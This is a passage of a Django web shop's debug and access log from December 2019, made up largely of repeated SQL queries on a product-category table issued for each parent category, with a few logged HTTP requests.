"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:43:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:45:07,834 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:45:07,843 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:45:07,848 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:45:07,851 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:45:07,856 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:45:07,859 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:45:07,862 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:45:07,866 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:45:07,869 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:45:07,874 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:45:07,877 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:45:07,880 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:45:07,883 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:45:07,887 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:45:07,892 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:45:07,895 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:45:07,898 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:45:07,901 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:45:07,905 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:45:07,910 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:45:07,913 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:45:07,917 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:45:07,921 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:45:07,925 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:45:07,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:45:07,933 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:45:07,937 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:45:07,940 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:45:07,943 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:45:07,948 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:45:07,955 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:45:07,959 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:45:07,963 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:45:07,967 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:45:07,971 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:45:07,977 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:45:07,981 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:45:07,985 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:45:07,989 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:45:07,993 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:45:07,997 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:45:08,002 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:45:08,006 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:45:08,010 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:45:08,018 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:45:08,023 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:45:08] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:45:24] "GET / HTTP/1.0" 302 0 [20/Dec/2019 07:50:01] "GET /whm-server-status HTTP/1.0" 301 0 DEBUG 2019-12-20 07:52:56,324 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:52:56,337 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:52:56,344 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:52:56,348 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:52:56,354 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:52:56,359 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:52:56,363 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:52:56,367 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:52:56,371 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:52:56,377 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:52:56,381 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:52:56,385 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:52:56,389 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:52:56,393 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:52:56,399 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:52:56,403 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:52:56,408 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:52:56,412 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:52:56,416 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:52:56,422 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:52:56,427 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", 